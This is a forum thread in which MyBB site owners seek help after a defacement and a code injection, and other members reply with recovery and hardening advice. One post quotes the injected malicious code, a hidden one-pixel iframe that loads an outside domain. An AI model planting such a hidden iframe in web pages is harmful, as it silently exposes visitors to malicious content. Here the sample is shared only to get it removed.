MyBB Community Forums

Full Version: Hacked and defaced? Please help!
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Well, I thought my website was secure since I had the latest version of MyBB, but I've been defaced.

http://envizioned.net

What do I do now? I can't log into my cPanel.
Looks like the hacker knew your cPanel login information and changed it. You need to ask your web host to reset the username and password combination. After that, follow this awesome guide:

http://mattrogowski.co.uk/?p=314
Alright, I went on their live support chat and they helped me change the cPanel information, I'm now checking if I made a backup... Because if I didn't I'm going to punch myself in the face... Thanks for posting that link, after I restore my website, I'm going to be doing everything on that list, I don't want this to happen again.
(2011-07-02, 08:59 PM)Insidious Wrote: [ -> ]I thought my website was secure since I had the latest version of MyBB

Don't assume that just because the forum software you use is running on it's latest version, that that makes the server you're on or your hosting account somehow impenetrable. A website or server can be hacked in numerous ways that have nothing to do with any of the software you've installed, and if you couldn't login to cPanel, it sounds like this person gained access via the host itself, as they're not going to be able to get or change your cPanel details via MyBB.
(2011-07-02, 10:28 PM)MattRogowski Wrote: [ -> ]
(2011-07-02, 08:59 PM)Insidious Wrote: [ -> ]I thought my website was secure since I had the latest version of MyBB

Don't assume that just because the forum software you use is running on it's latest version, that that makes the server you're on or your hosting account somehow impenetrable. A website or server can be hacked in numerous ways that have nothing to do with any of the software you've installed, and if you couldn't login to cPanel, it sounds like this person gained access via the host itself, as they're not going to be able to get or change your cPanel details via MyBB.


True, unless they just tried logging into my cPanel once because I was stupid enough to have the same password for both... Though, that doesn't explain how they would have figured out my username since the username I was given for my hosting is pretty weird and hard to guess... Anyways, thanks for the help and thanks for the awesome tutorial, I did everything it said, hopefully it helps prevent this from ever happening again. I'm going to try to do some more things, pretty much anything I can find.
The best you can do is to use long randomly generated passwords for all accounts (MyBB admin accounts, FTP login, database users, etc). You can also install Admin CP Honeypot, which creates a fake admin directory and emails you information about those who tried to login there.

http://mods.mybb.com/view/admin-cp-honeypot
I have a similar, but different issue. Several pages on my site had malicious code inserted...including myBB. I know what the code is, but can't figure out how to remove it from the forum. This is the location of it by using page source through my browser, but can't figure out where to go in the myBB files to remove it.

Quote:<iframe src="http://mkayzke.co.tv/?go=1" width="1" height="1"></iframe><div class="php_warning">MyBB Internal: One or more warnings occured. Please contact your administrator for assistance.</div><div class="php_warning">MyBB Internal: One or more warnings occured. Please contact your administrator for assistance.</div><div class="php_warning">MyBB Internal: One or more warnings occured. Please contact your administrator for assistance.</div><div class="php_warning">MyBB Internal: One or more warnings occured. Please contact your administrator for assistance.</div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: index -->
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
Reupload your files fresh, it's in a file somewhere. You'll be safer uploading everything again.